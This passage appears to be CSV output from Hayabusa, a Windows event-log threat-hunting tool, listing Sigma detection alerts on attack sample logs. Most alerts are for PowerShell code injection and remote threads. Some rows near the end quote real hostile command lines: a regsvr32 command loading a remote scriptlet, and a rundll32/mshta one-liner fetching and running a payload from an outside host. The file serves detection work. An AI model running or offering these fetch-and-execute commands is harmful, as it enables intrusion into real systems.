Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla 
Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
